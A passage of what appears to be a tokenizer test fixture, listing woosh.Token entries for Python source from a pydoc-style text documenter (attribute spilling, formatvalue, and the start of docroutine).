woosh.Token(woosh.OP, '%', 1437, 49, 1437, 50),
woosh.Token(woosh.NAME, 'tag', 1437, 51, 1437, 54),
woosh.Token(woosh.OP, ',', 1437, 54, 1437, 55),
woosh.Token(woosh.NAME, 'attrs', 1437, 56, 1437, 61),
woosh.Token(woosh.OP, ',', 1437, 61, 1437, 62),
woosh.Token(woosh.NAME, 'lambda', 1438, 26, 1438, 32),
woosh.Token(woosh.NAME, 't', 1438, 33, 1438, 34),
woosh.Token(woosh.OP, ':', 1438, 34, 1438, 35),
woosh.Token(woosh.NAME, 't', 1438, 36, 1438, 37),
woosh.Token(woosh.OP, '[', 1438, 37, 1438, 38),
woosh.Token(woosh.NUMBER, '1', 1438, 38, 1438, 39),
woosh.Token(woosh.OP, ']', 1438, 39, 1438, 40),
woosh.Token(woosh.OP, '==', 1438, 41, 1438, 43),
woosh.Token(woosh.STRING, "'static method'", 1438, 44, 1438, 59),
woosh.Token(woosh.OP, ')', 1438, 59, 1438, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1438, 60, 1439, 0),
woosh.Token(woosh.NAME, 'attrs', 1439, 12, 1439, 17),
woosh.Token(woosh.OP, '=', 1439, 18, 1439, 19),
woosh.Token(woosh.NAME, 'spilldescriptors', 1439, 20, 1439, 36),
woosh.Token(woosh.OP, '(', 1439, 36, 1439, 37),
woosh.Token(woosh.STRING, '"Readonly properties %s:\\n"', 1439, 37, 1439, 64),
woosh.Token(woosh.OP, '%', 1439, 65, 1439, 66),
woosh.Token(woosh.NAME, 'tag', 1439, 67, 1439, 70),
woosh.Token(woosh.OP, ',', 1439, 70, 1439, 71),
woosh.Token(woosh.NAME, 'attrs', 1439, 72, 1439, 77),
woosh.Token(woosh.OP, ',', 1439, 77, 1439, 78),
woosh.Token(woosh.NAME, 'lambda', 1440, 37, 1440, 43),
woosh.Token(woosh.NAME, 't', 1440, 44, 1440, 45),
woosh.Token(woosh.OP, ':', 1440, 45, 1440, 46),
woosh.Token(woosh.NAME, 't', 1440, 47, 1440, 48),
woosh.Token(woosh.OP, '[', 1440, 48, 1440, 49),
woosh.Token(woosh.NUMBER, '1', 1440, 49, 1440, 50),
woosh.Token(woosh.OP, ']', 1440, 50, 1440, 51),
woosh.Token(woosh.OP, '==', 1440, 52, 1440, 54),
woosh.Token(woosh.STRING, "'readonly property'", 1440, 55, 1440, 74),
woosh.Token(woosh.OP, ')', 1440, 74, 1440, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 1440, 75, 1441, 0),
woosh.Token(woosh.NAME, 'attrs', 1441, 12, 1441, 17),
woosh.Token(woosh.OP, '=', 1441, 18, 1441, 19),
woosh.Token(woosh.NAME, 'spilldescriptors', 1441, 20, 1441, 36),
woosh.Token(woosh.OP, '(', 1441, 36, 1441, 37),
woosh.Token(woosh.STRING, '"Data descriptors %s:\\n"', 1441, 37, 1441, 61),
woosh.Token(woosh.OP, '%', 1441, 62, 1441, 63),
woosh.Token(woosh.NAME, 'tag', 1441, 64, 1441, 67),
woosh.Token(woosh.OP, ',', 1441, 67, 1441, 68),
woosh.Token(woosh.NAME, 'attrs', 1441, 69, 1441, 74),
woosh.Token(woosh.OP, ',', 1441, 74, 1441, 75),
woosh.Token(woosh.NAME, 'lambda', 1442, 37, 1442, 43),
woosh.Token(woosh.NAME, 't', 1442, 44, 1442, 45),
woosh.Token(woosh.OP, ':', 1442, 45, 1442, 46),
woosh.Token(woosh.NAME, 't', 1442, 47, 1442, 48),
woosh.Token(woosh.OP, '[', 1442, 48, 1442, 49),
woosh.Token(woosh.NUMBER, '1', 1442, 49, 1442, 50),
woosh.Token(woosh.OP, ']', 1442, 50, 1442, 51),
woosh.Token(woosh.OP, '==', 1442, 52, 1442, 54),
woosh.Token(woosh.STRING, "'data descriptor'", 1442, 55, 1442, 72),
woosh.Token(woosh.OP, ')', 1442, 72, 1442, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 1442, 73, 1443, 0),
woosh.Token(woosh.NAME, 'attrs', 1443, 12, 1443, 17),
woosh.Token(woosh.OP, '=', 1443, 18, 1443, 19),
woosh.Token(woosh.NAME, 'spilldata', 1443, 20, 1443, 29),
woosh.Token(woosh.OP, '(', 1443, 29, 1443, 30),
woosh.Token(woosh.STRING, '"Data and other attributes %s:\\n"', 1443, 30, 1443, 63),
woosh.Token(woosh.OP, '%', 1443, 64, 1443, 65),
woosh.Token(woosh.NAME, 'tag', 1443, 66, 1443, 69),
woosh.Token(woosh.OP, ',', 1443, 69, 1443, 70),
woosh.Token(woosh.NAME, 'attrs', 1443, 71, 1443, 76),
woosh.Token(woosh.OP, ',', 1443, 76, 1443, 77),
woosh.Token(woosh.NAME, 'lambda', 1444, 30, 1444, 36),
woosh.Token(woosh.NAME, 't', 1444, 37, 1444, 38),
woosh.Token(woosh.OP, ':', 1444, 38, 1444, 39),
woosh.Token(woosh.NAME, 't', 1444, 40, 1444, 41),
woosh.Token(woosh.OP, '[', 1444, 41, 1444, 42),
woosh.Token(woosh.NUMBER, '1', 1444, 42, 1444, 43),
woosh.Token(woosh.OP, ']', 1444, 43, 1444, 44),
woosh.Token(woosh.OP, '==', 1444, 45, 1444, 47),
woosh.Token(woosh.STRING, "'data'", 1444, 48, 1444, 54),
woosh.Token(woosh.OP, ')', 1444, 54, 1444, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1444, 55, 1445, 0),
woosh.Token(woosh.NAME, 'assert', 1446, 12, 1446, 18),
woosh.Token(woosh.NAME, 'attrs', 1446, 19, 1446, 24),
woosh.Token(woosh.OP, '==', 1446, 25, 1446, 27),
woosh.Token(woosh.OP, '[', 1446, 28, 1446, 29),
woosh.Token(woosh.OP, ']', 1446, 29, 1446, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1446, 30, 1447, 0),
woosh.Token(woosh.NAME, 'attrs', 1447, 12, 1447, 17),
woosh.Token(woosh.OP, '=', 1447, 18, 1447, 19),
woosh.Token(woosh.NAME, 'inherited', 1447, 20, 1447, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1447, 29, 1448, 0),
woosh.Token(woosh.DEDENT, ' ', 1449, 0, 1449, 8),
woosh.Token(woosh.NAME, 'contents', 1449, 8, 1449, 16),
woosh.Token(woosh.OP, '=', 1449, 17, 1449, 18),
woosh.Token(woosh.STRING, "'\\n'", 1449, 19, 1449, 23),
woosh.Token(woosh.OP, '.', 1449, 23, 1449, 24),
woosh.Token(woosh.NAME, 'join', 1449, 24, 1449, 28),
woosh.Token(woosh.OP, '(', 1449, 28, 1449, 29),
woosh.Token(woosh.NAME, 'contents', 1449, 29, 1449, 37),
woosh.Token(woosh.OP, ')', 1449, 37, 1449, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1449, 38, 1450, 0),
woosh.Token(woosh.NAME, 'if', 1450, 8, 1450, 10),
woosh.Token(woosh.NAME, 'not', 1450, 11, 1450, 14),
woosh.Token(woosh.NAME, 'contents', 1450, 15, 1450, 23),
woosh.Token(woosh.OP, ':', 1450, 23, 1450, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1450, 24, 1451, 0),
woosh.Token(woosh.INDENT, ' ', 1451, 0, 1451, 12),
woosh.Token(woosh.NAME, 'return', 1451, 12, 1451, 18),
woosh.Token(woosh.NAME, 'title', 1451, 19, 1451, 24),
woosh.Token(woosh.OP, '+', 1451, 25, 1451, 26),
woosh.Token(woosh.STRING, "'\\n'", 1451, 27, 1451, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1451, 31, 1452, 0),
woosh.Token(woosh.DEDENT, ' ', 1452, 0, 1452, 8),
woosh.Token(woosh.NAME, 'return', 1452, 8, 1452, 14),
woosh.Token(woosh.NAME, 'title', 1452, 15, 1452, 20),
woosh.Token(woosh.OP, '+', 1452, 21, 1452, 22),
woosh.Token(woosh.STRING, "'\\n'", 1452, 23, 1452, 27),
woosh.Token(woosh.OP, '+', 1452, 28, 1452, 29),
woosh.Token(woosh.NAME, 'self', 1452, 30, 1452, 34),
woosh.Token(woosh.OP, '.', 1452, 34, 1452, 35),
woosh.Token(woosh.NAME, 'indent', 1452, 35, 1452, 41),
woosh.Token(woosh.OP, '(', 1452, 41, 1452, 42),
woosh.Token(woosh.NAME, 'contents', 1452, 42, 1452, 50),
woosh.Token(woosh.OP, '.', 1452, 50, 1452, 51),
woosh.Token(woosh.NAME, 'rstrip', 1452, 51, 1452, 57),
woosh.Token(woosh.OP, '(', 1452, 57, 1452, 58),
woosh.Token(woosh.OP, ')', 1452, 58, 1452, 59),
woosh.Token(woosh.OP, ',', 1452, 59, 1452, 60),
woosh.Token(woosh.STRING, "' | '", 1452, 61, 1452, 67),
woosh.Token(woosh.OP, ')', 1452, 67, 1452, 68),
woosh.Token(woosh.OP, '+', 1452, 69, 1452, 70),
woosh.Token(woosh.STRING, "'\\n'", 1452, 71, 1452, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 1452, 75, 1453, 0),
woosh.Token(woosh.DEDENT, ' ', 1454, 0, 1454, 4),
woosh.Token(woosh.NAME, 'def', 1454, 4, 1454, 7),
woosh.Token(woosh.NAME, 'formatvalue', 1454, 8, 1454, 19),
woosh.Token(woosh.OP, '(', 1454, 19, 1454, 20),
woosh.Token(woosh.NAME, 'self', 1454, 20, 1454, 24),
woosh.Token(woosh.OP, ',', 1454, 24, 1454, 25),
woosh.Token(woosh.NAME, 'object', 1454, 26, 1454, 32),
woosh.Token(woosh.OP, ')', 1454, 32, 1454, 33),
woosh.Token(woosh.OP, ':', 1454, 33, 1454, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1454, 34, 1455, 0),
woosh.Token(woosh.INDENT, ' ', 1455, 0, 1455, 8),
woosh.Token(woosh.STRING, '"""Format an argument default value as text."""', 1455, 8, 1455, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1455, 55, 1456, 0),
woosh.Token(woosh.NAME, 'return', 1456, 8, 1456, 14),
woosh.Token(woosh.STRING, "'='", 1456, 15, 1456, 18),
woosh.Token(woosh.OP, '+', 1456, 19, 1456, 20),
woosh.Token(woosh.NAME, 'self', 1456, 21, 1456, 25),
woosh.Token(woosh.OP, '.', 1456, 25, 1456, 26),
woosh.Token(woosh.NAME, 'repr', 1456, 26, 1456, 30),
woosh.Token(woosh.OP, '(', 1456, 30, 1456, 31),
woosh.Token(woosh.NAME, 'object', 1456, 31, 1456, 37),
woosh.Token(woosh.OP, ')', 1456, 37, 1456, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1456, 38, 1457, 0),
woosh.Token(woosh.DEDENT, ' ', 1458, 0, 1458, 4),
woosh.Token(woosh.NAME, 'def', 1458, 4, 1458, 7),
woosh.Token(woosh.NAME, 'docroutine', 1458, 8, 1458, 18),
woosh.Token(woosh.OP, '(', 1458, 18, 1458, 19),
woosh.Token(woosh.NAME, 'self', 1458, 19, 1458, 23),
woosh.Token(woosh.OP, ',', 1458, 23, 1458, 24),
woosh.Token(woosh.NAME, 'object', 1458, 25, 1458, 31),
woosh.Token(woosh.OP, ',', 1458, 31, 1458, 32),
woosh.Token(woosh.NAME, 'name', 1458, 33, 1458, 37),
woosh.Token(woosh.OP, '=', 1458, 37, 1458, 38),
woosh.Token(woosh.NAME, 'None', 1458, 38, 1458, 42),
woosh.Token(woosh.OP, ',', 1458, 42, 1458, 43),
woosh.Token(woosh.NAME, 'mod', 1458, 44, 1458, 47),
woosh.Token(woosh.OP, '=', 1458, 47, 1458, 48),
woosh.Token(woosh.NAME, 'None', 1458, 48, 1458, 52),
woosh.Token(woosh.OP, ',', 1458, 52, 1458, 53),
woosh.Token(woosh.NAME, 'cl', 1458, 54, 1458, 56),
woosh.Token(woosh.OP, '=', 1458, 56, 1458, 57),
woosh.Token(woosh.NAME, 'None', 1458, 57, 1458, 61),
woosh.Token(woosh.OP, ')', 1458, 61, 1458, 62),
woosh.Token(woosh.OP, ':', 1458, 62, 1458, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 1458, 63, 1459, 0),
woosh.Token(woosh.INDENT, ' ', 1459, 0, 1459, 8),
woosh.Token(woosh.STRING, '"""Produce text documentation for a function or method object."""', 1459, 8, 1459, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 1459, 73, 1460, 0),
woosh.Token(woosh.NAME, 'realname', 1460, 8, 1460, 16),
woosh.Token(woosh.OP, '=', 1460, 17, 1460, 18),
woosh.Token(woosh.NAME, 'object', 1460, 19, 1460, 25),
woosh.Token(woosh.OP, '.', 1460, 25, 1460, 26),
woosh.Token(woosh.NAME, '__name__', 1460, 26, 1460, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1460, 34, 1461, 0),
woosh.Token(woosh.NAME, 'name', 1461, 8, 1461, 12),
woosh.Token(woosh.OP, '=', 1461, 13, 1461, 14),
woosh.Token(woosh.NAME, 'name', 1461, 15, 1461, 19),
woosh.Token(woosh.NAME, 'or', 1461, 20, 1461, 22),
woosh.Token(woosh.NAME, 'realname', 1461, 23, 1461, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1461, 31, 1462, 0),
woosh.Token(woosh.NAME, 'note', 1462, 8, 1462, 12),
woosh.Token(woosh.OP, '=', 1462, 13, 1462, 14),
woosh.Token(woosh.STRING, "''", 1462, 15, 1462, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1462, 17, 1463, 0),
woosh.Token(woosh.NAME, 'skipdocs', 1463, 8, 1463, 16),
woosh.Token(woosh.OP, '=', 1463, 17, 1463, 18),
woosh.Token(woosh.NUMBER, '0', 1463, 19, 1463, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1463, 20, 1464, 0),
woosh.Token(woosh.NAME, 'if', 1464, 8, 1464, 10),
woosh.Token(woosh.NAME, '_is_bound_method', 1464, 11, 1464, 27),
woosh.Token(woosh.OP, '(', 1464, 27, 1464, 28),
woosh.Token(woosh.NAME, 'object', 1464, 28, 1464, 34),
woosh.Token(woosh.OP, ')', 1464, 34, 1464, 35),
woosh.Token(woosh.OP, ':', 1464, 35, 1464, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1464, 36, 1465, 0),
woosh.Token(woosh.INDENT, ' ', 1465, 0, 1465, 12),
woosh.Token(woosh.NAME, 'imclass', 1465, 12, 1465, 19),
woosh.Token(woosh.OP, '=', 1465, 20, 1465, 21),
woosh.Token(woosh.NAME, 'object', 1465, 22, 1465, 28),
woosh.Token(woosh.OP, '.', 1465, 28, 1465, 29),
woosh.Token(woosh.NAME, '__self__', 1465, 29, 1465, 37),
woosh.Token(woosh.OP, '.', 1465, 37, 1465, 38),
woosh.Token(woosh.NAME, '__class__', 1465, 38, 1465, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1465, 47, 1466, 0),
woosh.Token(woosh.NAME, 'if', 1466, 12, 1466, 14),
woosh.Token(woosh.NAME, 'cl', 1466, 15, 1466, 17),
woosh.Token(woosh.OP, ':', 1466, 17, 1466, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1466, 18, 1467, 0),
woosh.Token(woosh.INDENT, ' ', 1467, 0, 1467, 16),
woosh.Token(woosh.NAME, 'if', 1467, 16, 1467, 18),
woosh.Token(woosh.NAME, 'imclass', 1467, 19, 1467, 26),
woosh.Token(woosh.NAME, 'is', 1467, 27, 1467, 29),
woosh.Token(woosh.NAME, 'not', 1467, 30, 1467, 33),
woosh.Token(woosh.NAME, 'cl', 1467, 34, 1467, 36),
woosh.Token(woosh.OP, ':', 1467, 36, 1467, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1467, 37, 1468, 0),
woosh.Token(woosh.INDENT, ' ', 1468, 0, 1468, 20),
woosh.Token(woosh.NAME, 'note', 1468, 20, 1468, 24),
woosh.Token(woosh.OP, '=', 1468, 25, 1468, 26),
woosh.Token(woosh.STRING, "' from '", 1468, 27, 1468, 35),
woosh.Token(woosh.OP, '+', 1468, 36, 1468, 37),
woosh.Token(woosh.NAME, 'classname', 1468, 38, 1468, 47),
woosh.Token(woosh.OP, '(', 1468, 47, 1468, 48),
woosh.Token(woosh.NAME, 'imclass', 1468, 48, 1468, 55),
woosh.Token(woosh.OP, ',', 1468, 55, 1468, 56),
woosh.Token(woosh.NAME, 'mod', 1468, 57, 1468, 60),
woosh.Token(woosh.OP, ')', 1468, 60, 1468, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 1468, 61, 1469, 0),
woosh.Token(woosh.DEDENT, ' ', 1469, 0, 1469, 12),
woosh.Token(woosh.DEDENT, '', 1469, 12, 1469, 12),
woosh.Token(woosh.NAME, 'else', 1469, 12, 1469, 16),
woosh.Token(woosh.OP, ':', 1469, 16, 1469, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1469, 17, 1470, 0),
woosh.Token(woosh.INDENT, ' ', 1470, 0, 1470, 16),
woosh.Token(woosh.NAME, 'if', 1470, 16, 1470, 18),
woosh.Token(woosh.NAME, 'object', 1470, 19, 1470, 25),
woosh.Token(woosh.OP, '.', 1470, 25, 1470, 26),
woosh.Token(woosh.NAME, '__self__', 1470, 26, 1470, 34),
woosh.Token(woosh.NAME, 'is', 1470, 35, 1470, 37),
woosh.Token(woosh.NAME, 'not', 1470, 38, 1470, 41),
woosh.Token(woosh.NAME, 'None', 1470, 42, 1470, 46),
woosh.Token(woosh.OP, ':', 1470, 46, 1470, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1470, 47, 1471, 0),
woosh.Token(woosh.INDENT, ' ', 1471, 0, 1471, 20),
woosh.Token(woosh.NAME, 'note', 1471, 20, 1471, 24),
woosh.Token(woosh.OP, '=', 1471, 25, 1471, 26),
woosh.Token(woosh.STRING, "' method of %s instance'", 1471, 27, 1471, 51),
woosh.Token(woosh.OP, '%', 1471, 52, 1471, 53),
woosh.Token(woosh.NAME, 'classname', 1471, 54, 1471, 63),
woosh.Token(woosh.OP, '(', 1471, 63, 1471, 64),
woosh.Token(woosh.NAME, 'object', 1472, 24, 1472, 30),
woosh.Token(woosh.OP, '.', 1472, 30, 1472, 31),
woosh.Token(woosh.NAME, '__self__', 1472, 31, 1472, 39),
woosh.Token(woosh.OP, '.', 1472, 39, 1472, 40),
woosh.Token(woosh.NAME, '__class__', 1472, 40, 1472, 49),
woosh.Token(woosh.OP, ',', 1472, 49, 1472, 50),
woosh.Token(woosh.NAME, 'mod', 1472, 51, 1472, 54),
woosh.Token(woosh.OP, ')', 1472, 54, 1472, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1472, 55, 1473, 0),
woosh.Token(woosh.DEDENT, ' ', 1473, 0, 1473, 16),
woosh.Token(woosh.NAME, 'else', 1473, 16, 1473, 20),
woosh.Token(woosh.OP, ':', 1473, 20, 1473, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1473, 21, 1474, 0),
woosh.Token(woosh.INDENT, ' ', 1474, 0, 1474, 20),
woosh.Token(woosh.NAME, 'note', 1474, 20, 1474, 24),
woosh.Token(woosh.OP, '=', 1474, 25, 1474, 26),
woosh.Token(woosh.STRING, "' unbound %s method'", 1474, 27, 1474, 47),
woosh.Token(woosh.OP, '%', 1474, 48, 1474, 49),
woosh.Token(woosh.NAME, 'classname', 1474, 50, 1474, 59),
woosh.Token(woosh.OP, '(', 1474, 59, 1474, 60),
woosh.Token(woosh.NAME, 'imclass', 1474, 60, 1474, 67),
woosh.Token(woosh.OP, ',', 1474, 67, 1474, 68),
woosh.Token(woosh.NAME, 'mod', 1474, 68, 1474, 71),
woosh.Token(woosh.OP, ')', 1474, 71, 1474, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1474, 72, 1475, 0),
woosh.Token(woosh.DEDENT, ' ', 1476, 0, 1476, 8),
woosh.Token(woosh.DEDENT, '', 1476, 8, 1476, 8),
woosh.Token(woosh.DEDENT, '', 1476, 8, 1476, 8),
woosh.Token(woosh.NAME, 'if', 1476, 8, 1476, 10),
woosh.Token(woosh.OP, '(', 1476, 11, 1476, 12),
woosh.Token(woosh.NAME, 'inspect', 1476, 12, 1476, 19),
woosh.Token(woosh.OP, '.', 1476, 19, 1476, 20),
woosh.Token(woosh.NAME, 'iscoroutinefunction', 1476, 20, 1476, 39),
woosh.Token(woosh.OP, '(', 1476, 39, 1476, 40),
woosh.Token(woosh.NAME, 'object', 1476, 40, 1476, 46),
woosh.Token(woosh.OP, ')', 1476, 46, 1476, 47),
woosh.Token(woosh.NAME, 'or', 1476, 48, 1476, 50),
woosh.Token(woosh.NAME, 'inspect', 1477, 16, 1477, 23),
woosh.Token(woosh.OP, '.', 1477, 23, 1477, 24),
woosh.Token(woosh.NAME, 'isasyncgenfunction', 1477, 24, 1477, 42),
woosh.Token(woosh.OP, '(', 1477, 42, 1477, 43),
woosh.Token(woosh.NAME, 'object', 1477, 43, 1477, 49),
woosh.Token(woosh.OP, ')', 1477, 49, 1477, 50),
woosh.Token(woosh.OP, ')', 1477, 50, 1477, 51),
woosh.Token(woosh.OP, ':', 1477, 51, 1477, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1477, 52, 1478, 0),
woosh.Token(woosh.INDENT, ' ', 1478, 0, 1478, 12),
woosh.Token(woosh.NAME, 'asyncqualifier', 1478, 12, 1478, 26),
woosh.Token(woosh.OP, '=', 1478, 27, 1478, 28),
woosh.Token(woosh.STRING, "'async '", 1478, 29, 1478, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1478, 37, 1479, 0),
woosh.Token(woosh.DEDENT, ' ', 1479, 0, 1479, 8),
woosh.Token(woosh.NAME, 'else', 1479, 8, 1479, 12),
woosh.Token(woosh.OP, ':', 1479, 12, 1479, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1479, 13, 1480, 0),
woosh.Token(woosh.INDENT, ' ', 1480, 0, 1480, 12),
woosh.Token(woosh.NAME, 'asyncqualifier', 1480, 12, 1480, 26),
woosh.Token(woosh.OP, '=', 1480, 27, 1480, 28),
woosh.Token(woosh.STRING, "''", 1480, 29, 1480, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1480, 31, 1481, 0),
woosh.Token(woosh.DEDENT, ' ', 1482, 0, 1482, 8),
woosh.Token(woosh.NAME, 'if', 1482, 8, 1482, 10),
woosh.Token(woosh.NAME, 'name', 1482, 11, 1482, 15),
woosh.Token(woosh.OP, '==', 1482, 16, 1482, 18),
woosh.Token(woosh.NAME, 'realname', 1482, 19, 1482, 27),
woosh.Token(woosh.OP, ':', 1482, 27, 1482, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1482, 28, 1483, 0),
woosh.Token(woosh.INDENT, ' ', 1483, 0, 1483, 12),
woosh.Token(woosh.NAME, 'title', 1483, 12, 1483, 17),
woosh.Token(woosh.OP, '=', 1483, 18, 1483, 19),
woosh.Token(woosh.NAME, 'self', 1483, 20, 1483, 24),
woosh.Token(woosh.OP, '.', 1483, 24, 1483, 25),
woosh.Token(woosh.NAME, 'bold', 1483, 25, 1483, 29),
woosh.Token(woosh.OP, '(', 1483, 29, 1483, 30),
woosh.Token(woosh.NAME, 'realname', 1483, 30, 1483, 38),
woosh.Token(woosh.OP, ')', 1483, 38, 1483, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1483, 39, 1484, 0),
woosh.Token(woosh.DEDENT, ' ', 1484, 0, 1484, 8),
woosh.Token(woosh.NAME, 'else', 1484, 8, 1484, 12),
woosh.Token(woosh.OP, ':', 1484, 12, 1484, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1484, 13, 1485, 0),
woosh.Token(woosh.INDENT, ' ', 1485, 0, 1485, 12),
woosh.Token(woosh.NAME, 'if', 1485, 12, 1485, 14),
woosh.Token(woosh.NAME, 'cl', 1485, 15, 1485, 17),
woosh.Token(woosh.NAME, 'and', 1485, 18, 1485, 21),
woosh.Token(woosh.NAME, 'inspect', 1485, 22, 1485, 29),
woosh.Token(woosh.OP, '.', 1485, 29, 1485, 30),
woosh.Token(woosh.NAME, 'getattr_static', 1485, 30, 1485, 44),
woosh.Token(woosh.OP, '(', 1485, 44, 1485, 45),
woosh.Token(woosh.NAME, 'cl', 1485, 45, 1485, 47),
woosh.Token(woosh.OP, ',', 1485, 47, 1485, 48),
woosh.Token(woosh.NAME, 'realname', 1485, 49, 1485, 57),
woosh.Token(woosh.OP, ',', 1485, 57, 1485, 58),
woosh.Token(woosh.OP, '[', 1485, 59, 1485, 60),
woosh.Token(woosh.OP, ']', 1485, 60, 1485, 61),
woosh.Token(woosh.OP, ')', 1485, 61, 1485, 62),
woosh.Token(woosh.NAME, 'is', 1485, 63, 1485, 65),
woosh.Token(woosh.NAME, 'object', 1485, 66, 1485, 72),
woosh.Token(woosh.OP, ':', 1485, 72, 1485, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 1485, 73, 1486, 0),
woosh.Token(woosh.INDENT, ' ', 1486, 0, 1486, 16),
woosh.Token(woosh.NAME, 'skipdocs', 1486, 16, 1486, 24),
woosh.Token(woosh.OP, '=', 1486, 25, 1486, 26),
woosh.Token(woosh.NUMBER, '1', 1486, 27, 1486, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1486, 28, 1487, 0),
woosh.Token(woosh.DEDENT, ' ', 1487, 0, 1487, 12),
woosh.Token(woosh.NAME, 'title', 1487, 12, 1487, 17),
woosh.Token(woosh.OP, '=', 1487, 18, 1487, 19),
woosh.Token(woosh.NAME, 'self', 1487, 20, 1487, 24),
woosh.Token(woosh.OP, '.', 1487, 24, 1487, 25),
woosh.Token(woosh.NAME, 'bold', 1487, 25, 1487, 29),
woosh.Token(woosh.OP, '(', 1487, 29, 1487, 30),
woosh.Token(woosh.NAME, 'name', 1487, 30, 1487, 34),
woosh.Token(woosh.OP, ')', 1487, 34, 1487, 35),
woosh.Token(woosh.OP, '+', 1487, 36, 1487, 37),
woosh.Token(woosh.STRING, "' = '", 1487, 38, 1487, 43),
woosh.Token(woosh.OP, '+', 1487, 44, 1487, 45),
woosh.Token(woosh.NAME, 'realname', 1487, 46, 1487, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1487, 54, 1488, 0),
woosh.Token(woosh.DEDENT, ' ', 1488, 0, 1488, 8),
woosh.Token(woosh.NAME, 'argspec', 1488, 8, 1488, 15),
woosh.Token(woosh.OP, '=', 1488, 16, 1488, 17),
woosh.Token(woosh.NAME, 'None', 1488, 18, 1488, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1488, 22, 1489, 0),
woosh.Token(woosh.NAME, 'if', 1490, 8, 1490, 10),
woosh.Token(woosh.NAME, 'inspect', 1490, 11, 1490, 18),
woosh.Token(woosh.OP, '.', 1490, 18, 1490, 19),
woosh.Token(woosh.NAME, 'isroutine', 1490, 19, 1490, 28),
woosh.Token(woosh.OP, '(', 1490, 28, 1490, 29),
woosh.Token(woosh.NAME, 'object', 1490, 29, 1490, 35),
woosh.Token(woosh.OP, ')', 1490, 35, 1490, 36),
woosh.Token(woosh.OP, ':', 1490, 36, 1490, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1490, 37, 1491, 0),
woosh.Token(woosh.INDENT, ' ', 1491, 0, 1491, 12),
woosh.Token(woosh.NAME, 'try', 1491, 12, 1491, 15),
woosh.Token(woosh.OP, ':', 1491, 15, 1491, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1491, 16, 1492, 0),
woosh.Token(woosh.INDENT, ' ', 1492, 0, 1492, 16),
woosh.Token(woosh.NAME, 'signature', 1492, 16, 1492, 25),
woosh.Token(woosh.OP, '=', 1492, 26, 1492, 27),
woosh.Token(woosh.NAME, 'inspect', 1492, 28, 1492, 35),
woosh.Token(woosh.OP, '.', 1492, 35, 1492, 36),
woosh.Token(woosh.NAME, 'signature', 1492, 36, 1492, 45),
woosh.Token(woosh.OP, '(', 1492, 45, 1492, 46),
woosh.Token(woosh.NAME, 'object', 1492, 46, 1492, 52),
woosh.Token(woosh.OP, ')', 1492, 52, 1492, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1492, 53, 1493, 0),
woosh.Token(woosh.DEDENT, ' ', 1493, 0, 1493, 12),
woosh.Token(woosh.NAME, 'except', 1493, 12, 1493, 18),
woosh.Token(woosh.OP, '(', 1493, 19, 1493, 20),
woosh.Token(woosh.NAME, 'ValueError', 1493, 20, 1493, 30),
woosh.Token(woosh.OP, ',', 1493, 30, 1493, 31),
woosh.Token(woosh.NAME, 'TypeError', 1493, 32, 1493, 41),
woosh.Token(woosh.OP, ')', 1493, 41, 1493, 42),
woosh.Token(woosh.OP, ':', 1493, 42, 1493, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1493, 43, 1494, 0),
woosh.Token(woosh.INDENT, ' ', 1494, 0, 1494, 16),
woosh.Token(woosh.NAME, 'signature', 1494, 16, 1494, 25),
woosh.Token(woosh.OP, '=', 1494, 26, 1494, 27),
woosh.Token(woosh.NAME, 'None', 1494, 28, 1494, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1494, 32, 1495, 0),
woosh.Token(woosh.DEDENT, ' ', 1495, 0, 1495, 12),
woosh.Token(woosh.NAME, 'if', 1495, 12, 1495, 14),
woosh.Token(woosh.NAME, 'signature', 1495, 15, 1495, 24),
woosh.Token(woosh.OP, ':', 1495, 24, 1495, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1495, 25, 1496, 0),
woosh.Token(woosh.INDENT, ' ', 1496, 0, 1496, 16),
woosh.Token(woosh.NAME, 'argspec', 1496, 16, 1496, 23),
woosh.Token(woosh.OP, '=', 1496, 24, 1496, 25),
woosh.Token(woosh.NAME, 'str', 1496, 26, 1496, 29),
woosh.Token(woosh.OP, '(', 1496, 29, 1496, 30),
woosh.Token(woosh.NAME, 'signature', 1496, 30, 1496, 39),
woosh.Token(woosh.OP, ')', 1496, 39, 1496, 40),
